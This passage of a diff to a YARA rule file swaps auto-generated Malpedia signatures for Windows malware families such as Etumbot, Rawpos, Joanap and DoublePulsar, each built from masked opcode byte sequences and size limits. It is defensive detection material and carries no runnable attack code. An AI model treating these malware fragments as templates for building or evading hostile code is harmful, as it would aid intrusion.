+		$sequence_17 = { e8???????? 895500 9c e8???????? }
 
 	condition:
-		7 of them and filesize < 4121600
+		7 of them and filesize < 1679360
 }
-rule MALPEDIA_Win_Lechiket_Auto : FILE
+rule MALPEDIA_Win_Logpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3c392c3e-349a-5ca1-96fd-f1ca584c8f71"
+		id = "35b4ad0a-906a-5aa4-a185-d299d314c772"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lechiket"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lechiket_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.logpos_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "e5f8571d03794447ef51373bbf17c3e068216c3a3171d9d6c8a00d68358f6b61"
+		logic_hash = "1f09c571a98b8191fefaf5488e1ffd2ed1ffe04d05c499ee0ffd2f1f5274e533"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83838,34 +84191,34 @@ rule MALPEDIA_Win_Lechiket_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff45fc 817dfce8030000 0f8222ffffff 53 56 }
-		$sequence_1 = { 6800400000 8d4de8 8945fc e8???????? }
-		$sequence_2 = { 68???????? c685fcfeffff00 e8???????? 8d85fcfeffff 50 8d45fc 50 }
-		$sequence_3 = { 7c77 3c39 7f73 33c9 3c39 7f16 }
-		$sequence_4 = { 6a03 57 8b7d08 6880000000 56 8d45e8 }
-		$sequence_5 = { c645af54 c645b068 c645b172 c645b265 c645b361 }
-		$sequence_6 = { 7596 eb07 c7450c010000c0 8b4508 ff7008 ff15???????? }
-		$sequence_7 = { ff15???????? 8d45f8 50 8d45e8 50 56 53 }
-		$sequence_8 = { 83e103 f3a4 8b4218 83f8ff 7428 }
-		$sequence_9 = { ff34bd68830100 e8???????? a1???????? 47 83c504 3bf8 72bb }
+		$sequence_0 = { 6a00 ff15???????? 8945e4 8b450c 8b5510 }
+		$sequence_1 = { 8945fc 837dfc00 75df 8b45fc 89ec 5d }
+		$sequence_2 = { 8f45d8 4c 8b55c8 48 }
+		$sequence_3 = { a3???????? a1???????? 8b5508 8910 6a20 }
+		$sequence_4 = { b801000000 eb05 b800000000 8945d0 8b45d4 8d50ff 8955d4 }
+		$sequence_5 = { 83f800 75cb 8b45fc 83f802 7c05 }
+		$sequence_6 = { eb05 b800000000 89442410 8b442414 678d50ff 89542414 }
+		$sequence_7 = { 85c9 7408 48 89c8 48 8b09 ebf3 }
+		$sequence_8 = { 4d 89dc 48 0fb610 80fa2e 740b 41 }
+		$sequence_9 = { e8???????? 83c404 83f800 0f8537000000 833d????????00 0f852a000000 837d1400 }
 
 	condition:
-		7 of them and filesize < 331776
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Etumbot_Auto : FILE
+rule MALPEDIA_Win_Rawpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7578b31c-0ed7-55b3-8074-02b9b6496821"
+		id = "f6a04448-ba2c-50f7-b9f8-5b14dc2eb099"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.etumbot_auto.yar#L1-L321"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rawpos_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "619819745936f9a40c560bb9c0dbcb5d200dd2306f9f732e72d34a6b9dc82070"
+		logic_hash = "56a2b8fbb4e25a898a4bc87c65b7d85dae5bb8a6be93f75773ea8a26525a9a96"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -83877,59 +84230,32 @@ rule MALPEDIA_Win_Etumbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8811 8a00 02c2 0fb6c0 8a8405fcfeffff 320437 8806 }
-		$sequence_1 = { 8d45f4 6820a10700 50 68???????? }
-		$sequence_2 = { c745ac5c5c4d69 c745b063726f73 c745b46f66745c c745b85c57696e }
-		$sequence_3 = { 8d45a4 50 6801000080 c745a4536f6674 }
-		$sequence_4 = { ffd7 2bc3 3bc6 72ed }
-		$sequence_5 = { ffd7 8b7508 8bd8 69f660ea0000 }
-		$sequence_6 = { 33c7 f7d1 23c1 42 4e 75df }
-		$sequence_7 = { c745b46f66745c c745b85c57696e c745bc646f7773 c745c05c5c4375 c745c47272656e c745c874566572 c745cc73696f6e }
-		$sequence_8 = { 57 0fbe38 33f6 33db }
-		$sequence_9 = { c1e004 03c1 8bc8 81e1000000f0 7407 8bf9 }
-		$sequence_10 = { c745c874566572 c745cc73696f6e c745d05c5c496e c745d47465726e c745d865742053 }
-		$sequence_11 = { 81e1000000f0 7407 8bf9 c1ef18 33c7 f7d1 }
-		$sequence_12 = { c745d47465726e c745d865742053 c745dc65747469 c745e06e677300 }
-		$sequence_13 = { c645d720 c645d84e c645d954 c645da20 }
-		$sequence_14 = { a1???????? 57 83f801 7507 33c0 a3???????? }
-		$sequence_15 = { 034df0 8b5508 0355ec 8a02 }
-		$sequence_16 = { 6a00 68???????? 6a00 6a00 6a00 51 }
-		$sequence_17 = { e8???????? 85c0 75f5 53 }
-		$sequence_18 = { c645c653 c645c749 c645c845 c645c920 }
-		$sequence_19 = { 8811 8818 7cc3 8b450c }
-		$sequence_20 = { 8b4d08 034dec 8a11 8810 8b45f0 }
-		$sequence_21 = { 56 57 8b7d08 8065fe00 8d45e4 }
-		$sequence_22 = { c645f462 c645f56c 50 c645f665 }
-		$sequence_23 = { 8b45f4 0345f0 8b4d08 034dec }
-		$sequence_24 = { 83c204 3b5514 7608 83c8ff }
-		$sequence_25 = { 50 8d8504ffffff 50 c645e761 c645e874 c645e965 c645ea20 }
-		$sequence_26 = { c645c420 c645c54d c645c653 c645c749 }
-		$sequence_27 = { 8d4a01 83c404 8bd1 c1e902 }
-		$sequence_28 = { 80e10f c0e102 c0eb06 02cb }
-		$sequence_29 = { 881c2e c0e006 24c0 88442e01 8b442458 46 }
-		$sequence_30 = { 8d540964 52 e8???????? 83c404 }
-		$sequence_31 = { 53 8b5c240c 56 c60200 a1???????? }
-		$sequence_32 = { 83c104 3b4d14 7608 83c8ff }
-		$sequence_33 = { c645ce3b c645cf20 c645d057 c645d169 }
-		$sequence_34 = { 8b4d08 83c101 894d08 8b550c 83ea03 }
-		$sequence_35 = { 50 8bce e8???????? 8d85f4d2ffff 50 }
-		$sequence_36 = { c68511feffff34 c68512feffff33 c68513feffff72 c68514feffff74 c68515feffff7e }
+		$sequence_0 = { 83e82d 741d 83e828 7440 83e803 7446 eb4c }
+		$sequence_1 = { e9???????? ff45ec 8b55ec 3b55f8 7ede e9???????? c745ec01000000 }
+		$sequence_2 = { 23c8 33d2 894d0c 8955cc 8955d0 8b45d0 }
+		$sequence_3 = { 8bca 894dcc 8bd1 035514 8955d0 8955ec 668b5608 }
+		$sequence_4 = { 59 8b55e0 8b4d14 2b5508 33c0 8911 eb56 }
+		$sequence_5 = { 83c410 6a00 8d4df4 51 8d856845feff 50 e8???????? }
+		$sequence_6 = { ff550c 83c408 837dfc00 7505 83c8ff eb03 8b45fc }
+		$sequence_7 = { f6833523430004 7405 48 3bd0 76ee }
+		$sequence_8 = { 7507 be0a000000 eb12 83fe01 0f8ce6000000 83fe24 0f8fdd000000 }
+		$sequence_9 = { 8bd0 83e207 8911 8816 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 466944
 }
-rule MALPEDIA_Win_Salgorea_Auto : FILE
+rule MALPEDIA_Win_Darktequila_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e83328a9-575c-5760-8b43-23537ecb114c"
+		id = "269a3731-3e60-523d-8f8e-b11db5f03d72"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.salgorea_auto.yar#L1-L157"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darktequila_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "84460b5404731160a6417d2e0703563ce9ec3d697d914eab182f90119819d293"
+		logic_hash = "7a615b9f83311311d3befdcf3fa9a13c4c4dc7e52e3af67816a4aeaa810facc1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83943,38 +84269,32 @@ rule MALPEDIA_Win_Salgorea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f6d7 f7d9 6633d2 66b8b4d2 66b918f6 66f7f1 }
-		$sequence_1 = { 57 8b7910 3bfb 0f830a000000 }
-		$sequence_2 = { 8b44240c 0fbafa00 0fbcd2 8b542418 }
-		$sequence_3 = { d1e0 2ac1 0fbae001 37 d0e0 }
-		$sequence_4 = { b85b000000 51 b92ae90000 f7f1 0fbae304 6603c9 }
-		$sequence_5 = { 3bfb 0f830a000000 68???????? e8???????? 8b4510 }
-		$sequence_6 = { 660fbafa04 2f fec3 27 b885000000 f9 81f1b8600000 }
-		$sequence_7 = { 664b f9 52 80c237 66b86c00 }
-		$sequence_8 = { a1???????? 8945cc 8d45cc 3930 }
-		$sequence_9 = { 8d8c0ed6c162ca 8b704c 03f1 8b4850 }
-		$sequence_10 = { 8d8c0b78a46ad7 c1c107 03cf 8bde }
-		$sequence_11 = { 8d8c24b8000000 51 e8???????? 83c40c }
-		$sequence_12 = { 8d8c0b2211906b c1c107 03cf 8bfe }
-		$sequence_13 = { 8d8c399979825a 8b7df4 337df8 8bd1 }
-		$sequence_14 = { 8d8c0550fbffff e8???????? 83c408 eb16 ff75f8 }
-		$sequence_15 = { 8d8c399979825a 8bfe 337df0 8bd1 }
+		$sequence_0 = { b803000000 e8???????? 6a0b 50 e8???????? 8b4310 }
+		$sequence_1 = { ff15???????? 85c0 740a c705????????01000000 b80b000000 }
+		$sequence_2 = { 85c0 7423 8b4b10 803c085c 7404 c604085c }
+		$sequence_3 = { 8945f8 85c0 7467 8b4b0c }
+		$sequence_4 = { 85c0 740d 8d9b00000000 c60300 43 }
+		$sequence_5 = { 8b4d08 8b15???????? 8901 8913 }
+		$sequence_6 = { 85c0 740d 894610 b801000000 }
+		$sequence_7 = { 895e0c 5b c3 8b5610 }
+		$sequence_8 = { 8bc1 894308 8b45d8 8b4dfc 33cd }
+		$sequence_9 = { 85db 0f84c2000000 56 57 8d4102 e8???????? }
 
 	condition:
-		7 of them and filesize < 2007040
+		7 of them and filesize < 1827840
 }
-rule MALPEDIA_Win_Vshell_Auto : FILE
+rule MALPEDIA_Win_Joanap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4d7f1293-ffbb-5626-82e1-c6ee180846fc"
+		id = "5e1b53cb-7deb-5667-8a28-f48e8944278b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vshell_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.joanap_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "0b9171ca5e9865b14566a3ce59438d8b7cb591eb5aa3cd70720ec9582e22ec53"
+		logic_hash = "6fdacc4c6daa9a4be9b126a90beb146cca04ff56d03b259a90c3b1977b1b6f5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83988,32 +84308,32 @@ rule MALPEDIA_Win_Vshell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 885017 0fb6542465 440fb6442456 4401c2 885018 488d4b19 4889c3 }
-		$sequence_1 = { f20f59c8 66480f7ec8 e8???????? 488d0d89325500 48894c2478 4889842480000000 488b442468 }
-		$sequence_2 = { 48c1ff3f 4921f8 4a8d1c06 b908000000 4c89df 4889c6 4c89d0 }
-		$sequence_3 = { 746f 4883f813 7454 e8???????? 4889842498000000 48895c2460 90 }
-		$sequence_4 = { 7509 488d05ad5cb600 eb65 4883fe02 7509 488d058e5cb600 eb56 }
-		$sequence_5 = { 7462 6690 4180fbff 0f84f6000000 49bc9899999999999919 4c39e7 772f }
-		$sequence_6 = { e9???????? 488d842450010000 488d5c2454 b902000000 e8???????? 488b4c2478 4839cb }
-		$sequence_7 = { c3 488b9c24a0000000 488b842488010000 0f1f440000 e9???????? 440fb64c3c52 4131f1 }
-		$sequence_8 = { 88542475 440fb6842499000000 4488442474 440fb68c249a000000 44884c2473 440fb6942496000000 4488542472 }
-		$sequence_9 = { 7667 4881fa00100000 be00100000 4189d0 4c0f4fc6 90 4981f800100000 }
+		$sequence_0 = { 8bd0 81e20f000080 7905 4a 83caf0 42 8a92fc002d00 }
+		$sequence_1 = { 56 57 8d4c2468 e8???????? a1???????? 6a10 6a10 }
+		$sequence_2 = { 8b7e0c 8b74246c 894e40 897e44 895648 c6464c00 }
+		$sequence_3 = { b941000000 8dbc243c010000 6a00 6a0f f3a5 c744241400000000 c744241c28010000 }
+		$sequence_4 = { 668b4024 51 55 6689842440080000 e8???????? 83c414 83f8ff }
+		$sequence_5 = { 5e 81c400010000 c3 6a00 6a00 6a00 681f000f00 }
+		$sequence_6 = { 75f1 33f6 68???????? 8935???????? ff15???????? 8b842494000000 }
+		$sequence_7 = { 51 ff15???????? 85c0 7471 397c2410 }
+		$sequence_8 = { 52 e8???????? 83ec14 8b0d???????? b0ff }
+		$sequence_9 = { 8d842494000000 6880000000 50 6800040000 68???????? 6a02 e8???????? }
 
 	condition:
-		7 of them and filesize < 39452672
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Bachosens_Auto : FILE
+rule MALPEDIA_Win_Enigma_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fad5470b-a756-574b-813e-1cdf42efa6b2"
+		id = "3133a569-e0c5-5978-8ff0-ff719a8c5fe7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bachosens_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.enigma_loader_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "0a45763c922e1378fcd981d3ff76c84b7a49bb1ac5b3430f86089ebe86f29abf"
+		logic_hash = "a5243000c2e0d210886f2730559565c47c46e77ae7333cb6bce278e91fb001ee"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84027,34 +84347,34 @@ rule MALPEDIA_Win_Bachosens_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48895c2408 57 4883ec20 65488b042560000000 488bf9 }
-		$sequence_1 = { 75f5 33c9 41380a 7417 498bc2 660f1f840000000000 }
-		$sequence_2 = { 488d4002 66443908 75f3 418bc9 66390a }
-		$sequence_3 = { 80c1e0 3ad1 7513 49ffc0 }
-		$sequence_4 = { 7416 488b1b 488b1b 488bd7 488b4b50 e8???????? }
-		$sequence_5 = { ffc2 488d4001 803800 75f5 33c9 41380a 7417 }
-		$sequence_6 = { e8???????? 85c0 7416 488b1b 488b1b }
-		$sequence_7 = { 33c9 41380a 7417 498bc2 660f1f840000000000 ffc1 488d4001 }
-		$sequence_8 = { 488bc7 ffc2 488d4001 803800 75f5 33c9 41380a }
-		$sequence_9 = { 4c03d1 458b7220 418b521c 4c03f1 458b7a24 4803d1 }
+		$sequence_0 = { ff15???????? 85c0 790c 488d0daa400200 e9???????? 488b5c2450 ba9844c880 }
+		$sequence_1 = { 81f9df000000 7f7a 7451 81f9d4000000 7f1c 7447 81f9ce000000 }
+		$sequence_2 = { 4c897560 660f6f0d???????? f30f7f4d70 44887560 488d0521c70200 48898580000000 }
+		$sequence_3 = { 488b7908 4885ff 744e 488b29 488b0f 488b7108 }
+		$sequence_4 = { 4a0fbe843978940200 428a8c3988940200 482bd0 8b72fc d3ee 443bce 0f8d5f010000 }
+		$sequence_5 = { 418bc4 41f7e0 b801000000 c1ea04 662bc2 0fb7c0 6bc834 }
+		$sequence_6 = { 48c1e102 48c7c0fcffffff 482bc1 eb11 4c8b02 4d03c3 498bc0 }
+		$sequence_7 = { 83e901 7435 83f901 0f850c020000 660f6f05???????? c745c780000000 c745cbbf000000 }
+		$sequence_8 = { 0f8778070000 e9???????? 48897560 41bc0f000000 4c896578 48c7457005000000 8b05???????? }
+		$sequence_9 = { 48832300 4883c308 488d0514ce0100 483bd8 75d8 b001 4883c420 }
 
 	condition:
-		7 of them and filesize < 643072
+		7 of them and filesize < 798720
 }
-rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE
+rule MALPEDIA_Win_Kerrdown_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "54037fb5-02e6-50fe-b72a-3b42b6ceaa52"
+		id = "68770a3e-6717-5ac7-9970-7a5d2e8be7ee"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.op_blockbuster_auto.yar#L1-L326"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kerrdown_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "4209e51c2985f19271abc0c98d2263ec2c893b90a69757edcf9738231e4cef57"
+		logic_hash = "5c1e70ce1c83c058010acdca1cced0163370ed7a63b1ae0a7c0e9df6e4e225f4"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84066,56 +84386,32 @@ rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab 66ab aa 5f 85f6 5e }
-		$sequence_1 = { 56 57 683c400000 6a40 }
-		$sequence_2 = { e8???????? 6800400000 6a00 ff15???????? }
-		$sequence_3 = { 8a08 80f920 7505 83c021 }
-		$sequence_4 = { 8b497c 85c9 7407 51 }
-		$sequence_5 = { 6a00 e8???????? 85c0 7407 83f802 }
-		$sequence_6 = { ff15???????? 6808400000 6a40 ff15???????? }
-		$sequence_7 = { 68???????? ff15???????? 85c0 7412 68???????? 50 e8???????? }
-		$sequence_8 = { 68???????? 56 ff15???????? 68???????? 56 a3???????? e8???????? }
-		$sequence_9 = { 56 50 8d45fc 6a04 50 }
-		$sequence_10 = { 7f04 0409 eb06 3c72 }
-		$sequence_11 = { 3c69 7c08 3c70 7f04 0409 }
-		$sequence_12 = { ff15???????? 85c0 0f84aa000000 488b4c2448 488d442440 }
-		$sequence_13 = { 6689742434 4088b42450010000 e8???????? 488d4c2441 }
-		$sequence_14 = { 6a00 ff15???????? 8bf8 85ff 7504 5f 5e }
-		$sequence_15 = { 68???????? 56 e8???????? 56 e8???????? 83c438 }
-		$sequence_16 = { 03d0 8b05???????? 6bc03c 0305???????? 3bc2 7f17 8b05???????? }
-		$sequence_17 = { 53 6a01 57 e8???????? 56 e8???????? 83c414 }
-		$sequence_18 = { b910040000 ff15???????? 488bd8 4885c0 7445 488d442448 4c8d4c2450 }
-		$sequence_19 = { b930750000 ff15???????? f605????????02 740e ff15???????? f7d7 23f8 }
-		$sequence_20 = { ff15???????? 85f6 7404 85c0 }
-		$sequence_21 = { c3 33c0 ebf8 53 33db 391d???????? 56 }
-		$sequence_22 = { 4c89b424e8030000 4c89bc24e0030000 448bf3 b800400000 458bc5 4c8d4c2448 }
-		$sequence_23 = { ff15???????? 8bc6 5f 5e c3 33c0 }
-		$sequence_24 = { 8816 eb3e c6060d 8b048dd8974400 8854382a eb2e }
-		$sequence_25 = { 8bd1 d1f8 2b14c5a8324400 7413 85d2 7905 }
-		$sequence_26 = { 770f 0fb7c1 0fb680e0ff4300 83e00f eb02 33c0 }
-		$sequence_27 = { 8b4508 898850030000 8b4508 59 c7404840854400 8b4508 }
-		$sequence_28 = { 80f979 7f06 b3db 2ad9 }
-		$sequence_29 = { 50 68???????? 50 68???????? 68???????? 8d8514f2ffff }
-		$sequence_30 = { 6a00 ff15???????? 57 8bd8 ff15???????? 8b4c2414 68???????? }
-		$sequence_31 = { 83e01f 8b34b500a34000 8d04c0 8b0486 83f8ff }
-		$sequence_32 = { 6800000080 53 ff15???????? 8bf8 83c8ff 3bf8 }
-		$sequence_33 = { ff5108 6a01 5e ff15???????? 8bc6 5f }
+		$sequence_0 = { 0f83a2000000 c64405e800 40 83f804 }
+		$sequence_1 = { 64a300000000 8bf9 897ddc c745d800000000 }
+		$sequence_2 = { b8???????? 5f 5d c20800 85f6 75b2 }
+		$sequence_3 = { b9???????? 2bc2 50 68???????? e8???????? 5f 5d }
+		$sequence_4 = { 6800080000 8bf0 e8???????? 8bd8 83c408 }
+		$sequence_5 = { 897710 7202 8b0f c60100 b9???????? }
+		$sequence_6 = { 897ddc c745d800000000 33f6 c747140f000000 b8cd220000 837f1410 }
+		$sequence_7 = { b8???????? 8b15???????? 57 8b3d???????? 83ff10 0f43c1 3d???????? }
+		$sequence_8 = { a1???????? 33c4 8944241c 6807800000 ff15???????? }
+		$sequence_9 = { c745f800000000 83feff 7438 6a00 8d45f8 }
 
 	condition:
-		7 of them and filesize < 74309632
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Htran_Auto : FILE
+rule MALPEDIA_Win_Doublepulsar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "791ab88f-729e-59ed-af49-9775d8f95bf2"
+		id = "f29ce0a7-5938-5b7b-b2a5-1e58b48324b4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.htran_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doublepulsar_auto.yar#L1-L178"
 		license_url = "N/A"
-		logic_hash = "644467af100df6d78907af875b29f835634dff017ff5ecb28fa828ec75819c6e"
+		logic_hash = "2279c234c2a28c8a309faafd6821b4cb1af9e5365add72a62e549a791ef8e967"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84129,32 +84425,38 @@ rule MALPEDIA_Win_Htran_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 2bd5 8d8424f0520000 52 50 }
-		$sequence_1 = { 3b1d???????? 0f8315010000 8bc3 8bcb c1f805 83e11f 8b048500c54000 }
-		$sequence_2 = { 8d3449 8d34b5f09b4000 83c00c 3bc6 7304 }
-		$sequence_3 = { 8dbc24eca20000 c1e902 f3a5 8bc8 33c0 }
-		$sequence_4 = { 6a01 58 c20400 8b542404 }
-		$sequence_5 = { 85ff 7faf e9???????? 85ed 0f8e74feffff 85f6 0f8e6cfeffff }
-		$sequence_6 = { 8816 46 eb0f 0fb6d2 f682c1c3400004 }
-		$sequence_7 = { e9???????? 68???????? e8???????? 8b942430510000 55 52 }
-		$sequence_8 = { 33c0 8dbc24ec520000 f3ab 8d9424e4000000 52 53 }
-		$sequence_9 = { 899424e8010000 89b424e8000000 899424e4000000 33c0 8d8c24e8000000 }
+		$sequence_0 = { 31c9 39f9 744d 89d3 }
+		$sequence_1 = { 8944243c 6689442440 88442442 e8???????? 8bf0 83c404 3bf5 }
+		$sequence_2 = { 7405 bb03000000 8b9768010000 56 68???????? }
+		$sequence_3 = { 03c0 8b8c0088b84000 8b94008cb84000 03c0 56 51 52 }
+		$sequence_4 = { ff5608 85c0 744b 894530 8b4620 8b7d65 83c703 }
+		$sequence_5 = { 48 8bd0 ff5728 85c0 7555 3933 }
+		$sequence_6 = { 53 55 51 ff15???????? 8bfb 83c9ff 33c0 }
+		$sequence_7 = { 89742424 89742420 0f8ed8000000 8bf5 }
+		$sequence_8 = { 83c428 83f802 0f85c4fdffff 8d542420 8d44241c 52 }
+		$sequence_9 = { 57 c744242808164000 c744242cfc154000 c7442430f4154000 c7442434e0154000 89742424 ff15???????? }
+		$sequence_10 = { 33c0 33db 56 57 89442430 89442434 }
+		$sequence_11 = { 56 6a01 83c00c 51 e8???????? 8bf8 83c418 }
+		$sequence_12 = { 03f0 85f6 7f10 e8???????? 3d33270000 }
+		$sequence_13 = { a1???????? 83c408 8d54244c 83c020 52 68???????? }
+		$sequence_14 = { 5d 33c0 5b 81c41c210000 c21000 8b842438210000 }
+		$sequence_15 = { ffd5 83c408 85c0 7562 8b16 c744242401000000 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 140288
 }
-rule MALPEDIA_Win_Woody_Auto : FILE
+rule MALPEDIA_Win_Lightlesscan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1d402bd-2e1b-5cc3-9efe-bee43a3f6f70"
+		id = "2e37f7e0-e58a-5e11-9705-46b3e404ff4c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.woody_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightlesscan_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "9fa53ff2aea1026050fd9bf490e4459858b6e425e2d1081bd2beeba1427b1834"
+		logic_hash = "065574078c0aa4243fb06e1821f47ea5dd0c55644c6efc29c5c042e930dc4c7f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84168,32 +84470,32 @@ rule MALPEDIA_Win_Woody_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6881010100 50 e8???????? 83c414 8d8c2414010000 68b4000000 50 }
-		$sequence_1 = { f3a5 8bca 8b542420 83e103 8d442414 f3a4 8d4c242c }
-		$sequence_2 = { 23c7 8bce f7d1 23ca 0bc8 8d9c1956b7c7e8 035dc4 }
-		$sequence_3 = { 56 8903 ffd7 5f 5e 894304 5d }
-		$sequence_4 = { 8d7c2428 8d54241c f3ab 8d442414 8d4c2428 50 8b442414 }
-		$sequence_5 = { e8???????? 8b35???????? 8d8530fdffff 6a5c 50 ffd6 83c410 }
-		$sequence_6 = { 50 e8???????? 8d85b4feffff 83c40c 8945c8 8d45b8 50 }
-		$sequence_7 = { 56 85ed 57 0f843a020000 8b9424c40b0000 85d2 }
-		$sequence_8 = { 8b5604 85d2 740b 8bc1 2bc2 c1f803 3bf8 }
-		$sequence_9 = { 83c408 85c0 7505 bf01000000 85f6 7404 85ff }
+		$sequence_0 = { 488b542450 488bce e8???????? eb11 83fb04 0f8571070000 }
+		$sequence_1 = { 8905???????? 741b 488d0d0e750300 e8???????? 488b0d???????? ffd0 8b05???????? }
+		$sequence_2 = { 4c8bca 488905???????? 66c7000a01 e8???????? 488d0d0a180400 c705????????01000000 e8???????? }
+		$sequence_3 = { 48896c2418 56 57 4154 4881ec80020000 488b05???????? }
+		$sequence_4 = { 4c8d41ff 498bcc e8???????? 4c8d0580d30400 488d15f1cb0400 488d8d00020000 e8???????? }
+		$sequence_5 = { 48899c24e0040000 488b5c2448 4c89bc2490040000 4883c308 4c8d3d63780500 8b03 83f8ff }
+		$sequence_6 = { 4d2bc8 ba08020000 48ffc9 49d1f9 894d80 488d8df0030000 4d03c9 }
